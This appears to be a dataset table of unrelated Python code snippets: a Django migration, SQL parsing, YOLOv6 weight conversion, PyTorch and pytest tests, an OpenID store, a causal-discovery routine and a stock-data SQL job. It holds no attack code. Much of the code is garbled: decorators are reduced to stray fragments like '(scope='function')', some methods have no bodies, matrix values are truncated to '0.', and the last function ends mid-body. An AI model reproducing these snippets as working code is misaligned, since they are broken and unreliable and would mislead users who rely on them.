code stringlengths 281 23.7M |
|---|
class Migration(migrations.Migration):
dependencies = [('sites', '0002_alter_domain_unique'), ('projects', '0026_django2')]
operations = [migrations.AlterModelManagers(name='project', managers=[('objects', django.db.models.manager.Manager()), ('on_site', django.contrib.sites.managers.CurrentSiteManager())]), migrations.AddField(model_name='project', name='site', field=models.ForeignKey(default=1, help_text='The site this view belongs to (in a multi site setup).', on_delete=django.db.models.deletion.CASCADE, to='sites.Site', verbose_name='Site'), preserve_default=False)] |
def parse_col(toks, start_idx, tables_with_alias, schema, default_tables=None):
tok = toks[start_idx]
if (tok == '*'):
return (start_idx + 1)
if ('.' in tok):
(alias, col) = tok.split('.')
table = tables_with_alias[alias]
if (table not in schema):
schema[table] = []
schema[table].append(col)
toks[start_idx] = '{}.{}'.format(table, col)
return (start_idx + 1)
assert ((default_tables is not None) and (len(default_tables) > 0)), 'Default tables should not be None or empty'
def choose_best_table(default_tables, tok):
lower_tok = tok.lower()
candidate = process.extractOne(lower_tok, [table.lower() for table in default_tables])[0]
return candidate
if (len(default_tables) != 1):
table = choose_best_table(default_tables, tok)
else:
table = default_tables[0]
if (table not in schema):
schema[table] = []
schema[table].append(tok)
toks[start_idx] = '{}.{}'.format(table, tok)
return (start_idx + 1) |
def get_criterion(p):
if (p['criterion'] == 'simclr'):
from losses.losses import SimCLRLoss
criterion = SimCLRLoss(**p['criterion_kwargs'])
elif (p['criterion'] == 'scan'):
from losses.losses import SCANLoss
criterion = SCANLoss(**p['criterion_kwargs'])
elif (p['criterion'] == 'confidence-cross-entropy'):
from losses.losses import ConfidenceBasedCE
criterion = ConfidenceBasedCE(p['confidence_threshold'], p['criterion_kwargs']['apply_class_balancing'])
else:
raise ValueError('Invalid criterion {}'.format(p['criterion']))
return criterion |
def change_yolov6m():
state_dict = OrderedDict()
stem = []
new_key_more = []
ckpt_state = ckpt['model'].state_dict()
for (key, weight) in ckpt['model'].state_dict().items():
new_key = ''
new_key_origin = key.split('.')[0:]
if (new_key_origin[1] == 'stem'):
new_key_origin[1] = '0'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'ERBlock_2'):
if (new_key_origin[2] == '0'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '1'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
if (new_key_origin[2] == '1'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '2'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
elif (new_key_origin[1] == 'ERBlock_3'):
if (new_key_origin[2] == '0'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '3'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
if (new_key_origin[2] == '1'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '4'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
elif (new_key_origin[1] == 'ERBlock_4'):
if (new_key_origin[2] == '0'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '5'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
if (new_key_origin[2] == '1'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '6'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
elif (new_key_origin[1] == 'ERBlock_5'):
if (new_key_origin[2] == '0'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '7'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
if (new_key_origin[2] == '1'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '8'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
if (new_key_origin[2] == '2'):
new_key_more = new_key_origin[3:]
key1 = new_key_origin[0]
key2 = '9'
new_key = '.'.join(new_key_more)
new_key = ((((key1 + '.') + key2) + '.') + new_key)
elif (new_key_origin[1] == 'Rep_p4'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '13'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'Rep_p3'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '17'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'Rep_n3'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '20'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'Rep_n4'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '23'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'reduce_layer0'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '10'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'upsample0'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '11'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'reduce_layer1'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '14'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'upsample1'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '15'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'downsample2'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '18'
new_key = '.'.join(new_key_origin)
elif (new_key_origin[1] == 'downsample1'):
new_key_origin[0] = 'backbone'
new_key_origin[1] = '21'
new_key = '.'.join(new_key_origin)
else:
new_key = key
state_dict[new_key] = weight
print(f'Convert {key} to {new_key}')
checkpoint = dict()
checkpoint['model'] = state_dict
torch.save(checkpoint, 'weights/yolov6m_yaml.pt') |
class Meta():
def __init__(self, data):
self._meta = data.pop('meta', {})
self._links = data.pop('links', {})
self._included = data.pop('included', {})
def retrieve(self, data):
if (not self._included):
return data
return next(filter((lambda x: (x['id'] == data['id'])), self._included), data) |
def test_run_step_groups_none_groups():
with pytest.raises(ValueError) as err:
StepsRunner(get_valid_test_pipeline(), Context()).run_step_groups(groups=None, success_group='arb success', failure_group='arb fail')
assert (str(err.value) == 'you must specify which step-groups you want to run. groups is None.') |
def calc_loss(output, y, z_r):
y_masked = tf.where(z_r, y, (0 * tf.ones_like(y)))
y_masked_flat_refined = tf.reshape(y_masked, [(- 1), (IMAGE_HEIGHT * IMAGE_WIDTH)])
o_masked = tf.where(z_r, output, (0 * tf.ones_like(y)))
o_masked_flat_refined = tf.reshape(o_masked, [(- 1), (IMAGE_HEIGHT * IMAGE_WIDTH)])
mask_one_refined = tf.where(z_r, tf.ones_like(y), (0 * tf.ones_like(y)))
mask_one_flat_refined = tf.reshape(mask_one_refined, [(- 1), (IMAGE_HEIGHT * IMAGE_WIDTH)])
numOfPix = tf.reduce_sum(mask_one_flat_refined, 1)
d = tf.subtract(o_masked_flat_refined, y_masked_flat_refined)
d_sum = tf.reduce_sum(tf.square(d), 1)
cost = tf.reduce_mean(tf.truediv(d_sum, numOfPix))
return cost |
class OpenIdStore(BaseOpenIDStore):
def __init__(self, strategy):
super().__init__()
self.strategy = strategy
self.storage = strategy.storage
self.assoc = self.storage.association
self.nonce = self.storage.nonce
self.max_nonce_age = ((6 * 60) * 60)
def storeAssociation(self, server_url, association):
self.assoc.store(server_url, association)
def removeAssociation(self, server_url, handle):
associations_ids = list(dict(self.assoc.oids(server_url, handle)).keys())
if associations_ids:
self.assoc.remove(associations_ids)
def expiresIn(self, assoc):
if hasattr(assoc, 'getExpiresIn'):
return assoc.getExpiresIn()
else:
return assoc.expiresIn
def getAssociation(self, server_url, handle=None):
(associations, expired) = ([], [])
for (assoc_id, association) in self.assoc.oids(server_url, handle):
expires = self.expiresIn(association)
if (expires > 0):
associations.append(association)
elif (expires == 0):
expired.append(assoc_id)
if expired:
self.assoc.remove(expired)
if associations:
return associations[0]
def useNonce(self, server_url, timestamp, salt):
if (abs((timestamp - time.time())) > SKEW):
return False
return self.nonce.use(server_url, timestamp, salt) |
class TestAssert(TestNameCheckVisitorBase):
_passes()
def test_assert_never_fails(self):
def capybara():
tpl = ('this', "doesn't", 'work')
assert tpl
_passes()
def test_assert_bad_bool(self):
class X(object):
def __bool__(self):
raise Exception('I am a poorly behaved object')
__nonzero__ = __bool__
x = X()
def capybara():
assert x |
((not torch.cuda.is_available()), 'test requires a GPU')
class TestGradientScalingAMP(unittest.TestCase):
def setUp(self):
self.x = torch.tensor([2.0]).cuda().half()
weight = 3.0
bias = 5.0
self.error = 1.0
self.target = torch.tensor([(((self.x * weight) + bias) + self.error)]).cuda()
self.loss_fn = torch.nn.L1Loss()
self.model = torch.nn.Linear(1, 1)
self.model.weight.data = torch.tensor([[weight]])
self.model.bias.data = torch.tensor([bias])
self.model.cuda()
self.params = list(self.model.parameters())
self.namespace_dls = argparse.Namespace(optimizer='adam', lr=[0.1], adam_betas='(0.9, 0.999)', adam_eps=1e-08, weight_decay=0.0, threshold_loss_scale=1, min_loss_scale=0.0001)
self.scaler = GradScaler(init_scale=1, growth_interval=1)
def run_iter(self, model, params, optimizer):
optimizer.zero_grad()
with autocast():
y = model(self.x)
loss = self.loss_fn(y, self.target)
self.scaler.scale(loss).backward()
self.assertEqual(loss, torch.tensor(1.0, device='cuda:0', dtype=torch.float16))
self.scaler.unscale_(optimizer)
grad_norm = optimizer.clip_grad_norm(0)
self.assertAlmostEqual(grad_norm.item(), 2.2361, 4)
self.scaler.step(optimizer)
self.scaler.update()
self.assertEqual(model.weight, torch.tensor([[3.1]], device='cuda:0', requires_grad=True))
self.assertEqual(model.bias, torch.tensor([5.1], device='cuda:0', requires_grad=True))
self.assertEqual(self.scaler.get_scale(), 2.0)
def test_automatic_mixed_precision(self):
model = copy.deepcopy(self.model)
params = list(model.parameters())
optimizer = build_optimizer(self.namespace_dls, params)
self.run_iter(model, params, optimizer) |
('I set the section start type to {start_type}')
def when_I_set_the_section_start_type_to_start_type(context: Context, start_type: str):
new_start_type = {'None': None, 'CONTINUOUS': WD_SECTION.CONTINUOUS, 'EVEN_PAGE': WD_SECTION.EVEN_PAGE, 'NEW_COLUMN': WD_SECTION.NEW_COLUMN, 'NEW_PAGE': WD_SECTION.NEW_PAGE, 'ODD_PAGE': WD_SECTION.ODD_PAGE}[start_type]
context.section.start_type = new_start_type |
(scope='function')
def backend(request, backend_name, xephyr, wayland_session):
if (backend_name == 'x11'):
from test.backend.x11.conftest import XBackend
(yield XBackend({'DISPLAY': xephyr.display}, args=[xephyr.display]))
elif (backend_name == 'wayland'):
from test.backend.wayland.conftest import WaylandBackend
(yield WaylandBackend(wayland_session)) |
def load_single_data(task, train_lines):
if (task in ['SST-2', 'mr', 'cr']):
label_list = {}
for line in train_lines:
label = get_label(task, line)
label = str(label)
text = get_text(task, line)
if (label not in label_list):
label_list[label] = [[text.replace('\t', ' '), task, label]]
else:
label_list[label].append([text.replace('\t', ' '), task, label])
return label_list
if (task in ['MNLI', 'SNLI']):
label_list = {}
for line in train_lines:
label = get_label(task, line)
line_list = line.strip().split('\t')
if (task == 'MNLI'):
(sent1, sent2) = (line_list[8].replace('\t', ' '), line_list[9].replace('\t', ' '))
else:
(sent1, sent2) = (line_list[7].replace('\t', ' '), line_list[8].replace('\t', ' '))
if (sent1 == 'n/a'):
sent1 = 'None'
if (sent2 == 'n/a'):
sent2 = 'None'
if (label not in label_list):
label_list[label] = [[sent1, sent2, task, label]]
else:
label_list[label].append([sent1, sent2, task, label])
return label_list
if (task in ['MRPC', 'QQP']):
label_list = {}
for line in train_lines:
label = get_label(task, line)
line_list = line.strip().split('\t')
if (task == 'MRPC'):
(sent1, sent2) = (line_list[(- 1)].replace('\t', ' '), line_list[(- 2)].replace('\t', ' '))
else:
(sent1, sent2) = (line_list[(- 2)].replace('\t', ' '), line_list[(- 3)].replace('\t', ' '))
if (label not in label_list):
label_list[label] = [[sent1, sent2, task, label]]
else:
label_list[label].append([sent1, sent2, task, label])
return label_list |
def fas(data: ndarray, nodes: List[Node], independence_test_method: CIT_Base, alpha: float=0.05, knowledge: (BackgroundKnowledge | None)=None, depth: int=(- 1), verbose: bool=False, stable: bool=True, show_progress: bool=True) -> Tuple[(GeneralGraph, Dict[(Tuple[(int, int)], Set[int])], Dict[(Tuple[(int, int, Set[int])], float)])]:
if (type(data) != np.ndarray):
raise TypeError("'data' must be 'np.ndarray' type!")
if (not all((isinstance(node, Node) for node in nodes))):
raise TypeError("'nodes' must be 'List[Node]' type!")
if (not isinstance(independence_test_method, CIT_Base)):
raise TypeError("'independence_test_method' must be 'CIT_Base' type!")
if ((type(alpha) != float) or (alpha <= 0) or (alpha >= 1)):
raise TypeError("'alpha' must be 'float' type and between 0 and 1!")
if ((knowledge is not None) and (type(knowledge) != BackgroundKnowledge)):
raise TypeError("'knowledge' must be 'BackgroundKnowledge' type!")
if ((type(depth) != int) or (depth < (- 1))):
raise TypeError("'depth' must be 'int' type >= -1!")
if (depth == (- 1)):
depth = float('inf')
no_of_var = data.shape[1]
node_names = [node.get_name() for node in nodes]
cg = CausalGraph(no_of_var, node_names)
cg.set_ind_test(independence_test_method)
sep_sets: Dict[(Tuple[(int, int)], Set[int])] = {}
test_results: Dict[(Tuple[(int, int, Set[int])], float)] = {}
def remove_if_exists(x: int, y: int) -> None:
edge = cg.G.get_edge(cg.G.nodes[x], cg.G.nodes[y])
if (edge is not None):
cg.G.remove_edge(edge)
var_range = (tqdm(range(no_of_var), leave=True) if show_progress else range(no_of_var))
current_depth: int = (- 1)
while (((cg.max_degree() - 1) > current_depth) and (current_depth < depth)):
current_depth += 1
edge_removal = set()
for x in var_range:
if show_progress:
var_range.set_description(f'Depth={current_depth}, working on node {x}')
var_range.update()
Neigh_x = cg.neighbors(x)
if (len(Neigh_x) < (current_depth - 1)):
continue
for y in Neigh_x:
sepsets = set()
if ((knowledge is not None) and knowledge.is_forbidden(cg.G.nodes[x], cg.G.nodes[y]) and knowledge.is_forbidden(cg.G.nodes[y], cg.G.nodes[x])):
if (not stable):
remove_if_exists(x, y)
remove_if_exists(y, x)
append_value(cg.sepset, x, y, ())
append_value(cg.sepset, y, x, ())
sep_sets[(x, y)] = set()
sep_sets[(y, x)] = set()
break
else:
edge_removal.add((x, y))
edge_removal.add((y, x))
Neigh_x_noy = np.delete(Neigh_x, np.where((Neigh_x == y)))
for S in combinations(Neigh_x_noy, current_depth):
p = cg.ci_test(x, y, S)
test_results[(x, y, S)] = p
if (p > alpha):
if verbose:
print(('%d ind %d | %s with p-value %f\n' % (x, y, S, p)))
if (not stable):
remove_if_exists(x, y)
remove_if_exists(y, x)
append_value(cg.sepset, x, y, S)
append_value(cg.sepset, y, x, S)
sep_sets[(x, y)] = set(S)
sep_sets[(y, x)] = set(S)
break
else:
edge_removal.add((x, y))
edge_removal.add((y, x))
for s in S:
sepsets.add(s)
elif verbose:
print(('%d dep %d | %s with p-value %f\n' % (x, y, S, p)))
append_value(cg.sepset, x, y, tuple(sepsets))
append_value(cg.sepset, y, x, tuple(sepsets))
for (x, y) in edge_removal:
remove_if_exists(x, y)
if (cg.sepset[(x, y)] is not None):
origin_set = set((l_in for l_out in cg.sepset[(x, y)] for l_in in l_out))
sep_sets[(x, y)] = origin_set
sep_sets[(y, x)] = origin_set
return (cg.G, sep_sets, test_results) |
(web_fixture=WebFixture)
class ResultScenarios(Fixture):
def json(self):
self.method_result = JsonResult(IntegerField(), catch_exception=Exception)
self.value_to_return = 1
self.expected_response = '1'
self.exception_response = '"exception text"'
self.expected_charset = self.method_result.encoding
self.expected_content_type = 'application/json'
self.results_match = (lambda x, y: (x == y))
(Widget)
class WidgetStub(Widget):
css_id = 'someid'
def render_contents(self):
return '<the widget contents>'
def get_contents_js(self, context=None):
return ['some', 'some', 'javascript']
def widget(self):
self.method_result = WidgetResult([self.WidgetStub(self.web_fixture.view)], as_json_and_result=False)
self.value_to_return = 'ignored in this case'
self.expected_response = '<the widget contents><script type="text/javascript">javascriptsome</script>'
self.exception_response = Exception
self.expected_charset = self.method_result.encoding
self.expected_content_type = 'text/html'
self.results_match = (lambda x, y: (x == y))
def widget_as_json(self):
self.method_result = WidgetResult([self.WidgetStub(self.web_fixture.view)])
[self.web_fixture.view.page] = self.method_result.result_widgets
self.value_to_return = 'ignored in this case'
self.expected_response = {'result': {'someid': '<the widget contents><script type="text/javascript">javascriptsome</script>'}, 'success': True, 'exception': ''}
self.expected_charset = self.method_result.encoding
self.expected_content_type = 'application/json'
def results_match(expected, actual):
return (json.loads(actual) == expected)
self.results_match = results_match |
def test_cell_n3(mesh=([9] * 3)):
cell = pbcgto.Cell()
cell.unit = 'A'
cell.atom = 'C 0., 0., 0.; C 0.8917, 0.8917, 0.8917'
cell.a = '0. 1.7834 1.7834\n 1.7834 0. 1.7834\n 1.7834 1.7834 0. '
cell.basis = 'gth-szv'
cell.pseudo = 'gth-pade'
cell.mesh = mesh
cell.output = '/dev/null'
cell.build()
return cell |
def _warn_on_old_setuptools(_version: str=setuptools.__version__) -> None:
if (int(_version.split('.')[0]) < 61):
warnings.warn(RuntimeWarning(f'''
ERROR: setuptools=={_version} is used in combination with setuptools_scm>=8.x
Your build configuration is incomplete and previously worked by accident!
setuptools_scm requires setuptools>=61
Suggested workaround if applicable:
- migrating from the deprecated setup_requires mechanism to pep517/518
and using a pyproject.toml to declare build dependencies
which are reliably pre-installed before running the build tools
''')) |
class NestedDict():
def __init__(self) -> None:
self.dict: Dict[(str, Any)] = {}
def get_or_create_nest(self, key: Key, *, access_lists: bool=True) -> dict:
cont: Any = self.dict
for k in key:
if (k not in cont):
cont[k] = {}
cont = cont[k]
if (access_lists and isinstance(cont, list)):
cont = cont[(- 1)]
if (not isinstance(cont, dict)):
raise KeyError('There is no nest behind this key')
return cont
def append_nest_to_list(self, key: Key) -> None:
cont = self.get_or_create_nest(key[:(- 1)])
last_key = key[(- 1)]
if (last_key in cont):
list_ = cont[last_key]
try:
list_.append({})
except AttributeError:
raise KeyError('An object other than list found behind this key')
else:
cont[last_key] = [{}] |
def raises_exc(exc: Union[(Type[E], E)], func: Callable[([], Any)], *, match: Optional[str]=None) -> E:
exc_type = (exc if isinstance(exc, type) else type(exc))
with pytest.raises(exc_type, match=match) as exc_info:
func()
assert (_repr_value(exc_info.value) == _repr_value(exc))
return exc_info.value |
class TestDraw():
def test_univariate(self):
with pm.Model():
x = pm.Normal('x')
x_draws = pm.draw(x)
assert (x_draws.shape == ())
(x_draws,) = pm.draw([x])
assert (x_draws.shape == ())
x_draws = pm.draw(x, draws=10)
assert (x_draws.shape == (10,))
(x_draws,) = pm.draw([x], draws=10)
assert (x_draws.shape == (10,))
def test_multivariate(self):
with pm.Model():
mln = pm.Multinomial('mln', n=5, p=np.array([0.25, 0.25, 0.25, 0.25]))
mln_draws = pm.draw(mln, draws=1)
assert (mln_draws.shape == (4,))
(mln_draws,) = pm.draw([mln], draws=1)
assert (mln_draws.shape == (4,))
mln_draws = pm.draw(mln, draws=10)
assert (mln_draws.shape == (10, 4))
(mln_draws,) = pm.draw([mln], draws=10)
assert (mln_draws.shape == (10, 4))
def test_multiple_variables(self):
with pm.Model():
x = pm.Normal('x')
y = pm.Normal('y', shape=10)
z = pm.Uniform('z', shape=5)
w = pm.Dirichlet('w', a=[1, 1, 1])
num_draws = 100
draws = pm.draw((x, y, z, w), draws=num_draws)
assert (draws[0].shape == (num_draws,))
assert (draws[1].shape == (num_draws, 10))
assert (draws[2].shape == (num_draws, 5))
assert (draws[3].shape == (num_draws, 3))
def test_draw_different_samples(self):
with pm.Model():
x = pm.Normal('x')
x_draws_1 = pm.draw(x, 100)
x_draws_2 = pm.draw(x, 100)
assert (not np.all(np.isclose(x_draws_1, x_draws_2)))
def test_draw_pytensor_function_kwargs(self):
sharedvar = pytensor.shared(0)
x = pm.DiracDelta.dist(0.0)
y = (x + sharedvar)
draws = pm.draw(y, draws=5, mode=Mode('py'), updates={sharedvar: (sharedvar + 1)})
assert np.all((draws == np.arange(5))) |
.parametrize(('widget_field', 'field_name'), [('show_boss_life', 'show_boss_lifebar'), ('show_enemy_life', 'show_enemy_life'), ('show_enemy_damage', 'show_enemy_damage'), ('show_player_damage', 'show_player_damage'), ('show_death_counter', 'show_death_counter'), ('enable_auto_tracker', 'enable_auto_tracker')])
def test_certain_field(skip_qtbot: pytestqt.qtbot.QtBot, widget_field: str, field_name: str) -> None:
cosmetic_patches = DreadCosmeticPatches(**{field_name: False})
dialog = DreadCosmeticPatchesDialog(None, cosmetic_patches)
skip_qtbot.addWidget(dialog)
skip_qtbot.mouseClick(getattr(dialog, widget_field), QtCore.Qt.MouseButton.LeftButton)
assert (dialog.cosmetic_patches == DreadCosmeticPatches(**{field_name: True})) |
def compatible_platforms(provided, required):
if ((provided is None) or (required is None) or (provided == required)):
return True
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
if (not provMac):
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = ('%s.%s' % (reqMac.group(1), reqMac.group(2)))
if (((dversion == 7) and (macosversion >= '10.3')) or ((dversion == 8) and (macosversion >= '10.4'))):
return True
return False
if ((provMac.group(1) != reqMac.group(1)) or (provMac.group(3) != reqMac.group(3))):
return False
if (int(provMac.group(2)) > int(reqMac.group(2))):
return False
return True
return False |
def setUpModule():
global cell, mf, kmf, kpts
cell = pgto.Cell()
cell.atom = '\n He 0 0 1\n He 1 0 1\n '
cell.basis = '321g'
cell.a = (np.eye(3) * 3)
cell.mesh = ([8] * 3)
cell.verbose = 7
cell.output = '/dev/null'
cell.spin = 2
cell.build()
nk = [2, 2, 1]
kpts = cell.make_kpts(nk, wrap_around=True)
kmf = pscf.KUHF(cell, kpts).run(conv_tol=1e-08)
mf = pscf.UHF(cell).run(conv_tol=1e-08) |
class ServerHost(abc.ABC):
def port(self) -> int:
raise NotImplementedError
def contrib_auth_token(self) -> str:
raise NotImplementedError
def contrib_secret(self) -> str:
def user_agent(self) -> Optional[str]:
def log_exception(self, exc: BaseException) -> None:
def log(self, message: str) -> None:
def trusted_users(self) -> AbstractSet[str]:
return frozenset() |
def _registerBuiltinFunctions():
try:
import apex
OptimizerRegistry.register('Lamb')(apex.optimizers.FusedLAMB)
except:
raise ImportError('`import apex` failed. Apex not installed.')
OptimizerRegistry.register('Adam')(torch.optim.Adam)
LrSchedulerRegistry.register('ReduceLROnPlateau')(torch.optim.lr_scheduler.ReduceLROnPlateau)
LrSchedulerRegistry.register('Exponential')(torch.optim.lr_scheduler.ExponentialLR)
LrSchedulerRegistry.register('MultiStep')(torch.optim.lr_scheduler.MultiStepLR)
LrSchedulerRegistry.register('OneCycle')(torch.optim.lr_scheduler.OneCycleLR) |
class CodeManager():
def __init__(self, owner):
self.code_blocks = {}
self.key_pressed_blocks = {}
self.broadcast_blocks = {}
self.clicked_blocks = []
self.current_block: CodeBlock = None
self.owner = owner
def process_key_pressed(self, key):
if (key in self.key_pressed_blocks):
for name in self.key_pressed_blocks[key]:
self.code_blocks[name].start_if_not_running()
def process_click(self):
for block in self.clicked_blocks:
block.start_or_restart()
def process_broadcast(self, message):
if (message in self.broadcast_blocks):
for name in self.broadcast_blocks[message]:
self.code_blocks[name].start_or_restart()
def register_code_block(self, generator_function, name='', no_refresh=False):
new_block = CodeBlock(self.owner, generator_function, name, no_refresh=no_refresh)
self.code_blocks[new_block.name] = new_block
print(f'New code block registered: {new_block.name}')
return new_block
def _update(self, dt):
for name in self.code_blocks:
self.current_block = self.code_blocks[name]
self.code_blocks[name].update(dt) |
def get_sample_fn(params, is_training=False, use_prior=False, reuse=False, output_length=None):
def model(inputs):
outputs = get_singleseq_encoding_model(inputs, params, is_training, reuse)
outputs = get_latent_encoding_model(inputs, outputs, params, is_training, use_prior, reuse)
outputs = get_latent_decoding_model(inputs, outputs, params, is_training, reuse)
outputs = get_seq_decoding_model(inputs, outputs, params, is_training, reuse, output_length)
return outputs
return model |
def test_vgg():
with pytest.raises(KeyError):
VGG(18)
with pytest.raises(AssertionError):
VGG(11, num_stages=0)
with pytest.raises(AssertionError):
VGG(11, num_stages=6)
with pytest.raises(AssertionError):
VGG(11, dilations=(1, 1), num_stages=3)
with pytest.raises(TypeError):
model = VGG(11)
model.init_weights(pretrained=0)
model = VGG(11, norm_eval=True)
model.init_weights()
model.train()
assert check_norm_state(model.modules(), False)
model = VGG(11, out_indices=(0, 1, 2, 3, 4))
model.init_weights()
model.train()
imgs = torch.randn(1, 3, 224, 224)
feat = model(imgs)
assert (len(feat) == 5)
assert (feat[0].shape == (1, 64, 112, 112))
assert (feat[1].shape == (1, 128, 56, 56))
assert (feat[2].shape == (1, 256, 28, 28))
assert (feat[3].shape == (1, 512, 14, 14))
assert (feat[4].shape == (1, 512, 7, 7))
model = VGG(11, num_classes=10, out_indices=(0, 1, 2, 3, 4, 5))
model.init_weights()
model.train()
imgs = torch.randn(1, 3, 224, 224)
feat = model(imgs)
assert (len(feat) == 6)
assert (feat[0].shape == (1, 64, 112, 112))
assert (feat[1].shape == (1, 128, 56, 56))
assert (feat[2].shape == (1, 256, 28, 28))
assert (feat[3].shape == (1, 512, 14, 14))
assert (feat[4].shape == (1, 512, 7, 7))
assert (feat[5].shape == (1, 10))
model = VGG(11, norm_cfg=dict(type='BN'), out_indices=(0, 1, 2, 3, 4))
model.init_weights()
model.train()
imgs = torch.randn(1, 3, 224, 224)
feat = model(imgs)
assert (len(feat) == 5)
assert (feat[0].shape == (1, 64, 112, 112))
assert (feat[1].shape == (1, 128, 56, 56))
assert (feat[2].shape == (1, 256, 28, 28))
assert (feat[3].shape == (1, 512, 14, 14))
assert (feat[4].shape == (1, 512, 7, 7))
model = VGG(11, num_classes=10, norm_cfg=dict(type='BN'), out_indices=(0, 1, 2, 3, 4, 5))
model.init_weights()
model.train()
imgs = torch.randn(1, 3, 224, 224)
feat = model(imgs)
assert (len(feat) == 6)
assert (feat[0].shape == (1, 64, 112, 112))
assert (feat[1].shape == (1, 128, 56, 56))
assert (feat[2].shape == (1, 256, 28, 28))
assert (feat[3].shape == (1, 512, 14, 14))
assert (feat[4].shape == (1, 512, 7, 7))
assert (feat[5].shape == (1, 10))
model = VGG(13, out_indices=(0, 1, 2))
model.init_weights()
model.train()
imgs = torch.randn(1, 3, 224, 224)
feat = model(imgs)
assert (len(feat) == 3)
assert (feat[0].shape == (1, 64, 112, 112))
assert (feat[1].shape == (1, 128, 56, 56))
assert (feat[2].shape == (1, 256, 28, 28))
model = VGG(16)
model.init_weights()
model.train()
imgs = torch.randn(1, 3, 224, 224)
feat = model(imgs)
assert (feat.shape == (1, 512, 7, 7))
model = VGG(19, num_classes=10)
model.init_weights()
model.train()
imgs = torch.randn(1, 3, 224, 224)
feat = model(imgs)
assert (feat.shape == (1, 10)) |
def stat_all_lite_sell(tmp_datetime):
datetime_str = tmp_datetime.strftime('%Y-%m-%d')
datetime_int = tmp_datetime.strftime('%Y%m%d')
print('datetime_str:', datetime_str)
print('datetime_int:', datetime_int)
sql_1 = '\n SELECT `date`,`code`,`name`,`latest_price`,`quote_change`,`ups_downs`,`volume`,`turnover`,\n `amplitude`,`high`,`low`,`open`,`closed`,`quantity_ratio`,`turnover_rate`,`pe_dynamic`,`pb`,\n `kdjj`,`rsi_6`,`cci`\n FROM stock_data.guess_indicators_daily WHERE `date` = %s \n and kdjk <= 20 and kdjd <= 30 and kdjj <= 10 \n '
try:
del_sql = (" DELETE FROM `stock_data`.`guess_indicators_lite_sell_daily` WHERE `date`= '%s' " % datetime_int)
common.insert(del_sql)
except Exception as e:
print('error :', e)
data = pd.read_sql(sql=sql_1, con=common.engine(), params=[datetime_int])
data = data.drop_duplicates(subset='code', keep='last')
print(' stat_all_lite_sell len data :', len(data))
try:
common.insert_db(data, 'guess_indicators_lite_sell_daily', False, '`date`,`code`')
except Exception as e:
print('error :', e) |
def _name_from_filename(metafile):
(rootdir, basename) = os.path.split(metafile)
if (basename == 'pyproject.toml'):
dirname = os.path.dirname(rootdir)
name = (dirname[3:] if dirname.startswith('bm_') else None)
elif (basename.startswith('bm_') and basename.endswith('.toml')):
name = basename[3:(- 5)]
else:
name = None
return (name, rootdir) |
def get_data():
data = {}
data['instances'] = []
for npz_file in sorted((here / 'data').listdir()):
if (not re.match('[0-9]+.npz', npz_file.basename())):
continue
instance = dict(np.load(npz_file))
instance['id'] = int(npz_file.basename().stem)
data['instances'].append(instance)
data['rgb'] = imgviz.io.imread('data/image.png')
depth = np.load('data/depth.npz')['arr_0']
depth = (depth.astype(np.float32) / 1000)
data['depth'] = depth
with open('data/camera_info.yaml') as f:
camera_info = yaml.safe_load(f)
data['intrinsic_matrix'] = np.array(camera_info['K']).reshape(3, 3)
data['T_cinematic2world'] = np.array([[0., (- 0.), 0., (- 0.)], [0., 0.166384, (- 0.), 0.3910296], [(- 0.0570783), 0., 0., 0.], [0.0, 0.0, 0.0, 1.0]])
return data |
class Lzma(Codec):
codec_id = 'imagecodecs_lzma'
def __init__(self, level=None):
self.level = level
def encode(self, buf):
return imagecodecs.lzma_encode(buf, level=self.level)
def decode(self, buf, out=None):
return imagecodecs.lzma_decode(buf, out=_flat(out)) |
def f1(items):
results = list(zip(*items))
(gold_positives, pred_positives) = (defaultdict(list), defaultdict(list))
for (gold, pred, question) in zip(results[0], results[1], results[2]):
gold_positives[question].append(gold)
pred_positives[question].append(pred)
f1 = []
for question in gold_positives.keys():
(gp, pp) = (sum(gold_positives[question]), sum(pred_positives[question]))
tp = sum(np.logical_and(gold_positives[question], pred_positives[question]))
p = ((tp / pp) if (pp > 0.0) else 1.0)
r = ((tp / gp) if (gp > 0.0) else 1.0)
if ((p + r) > 0.0):
f1.append(((2.0 * (p * r)) / (p + r)))
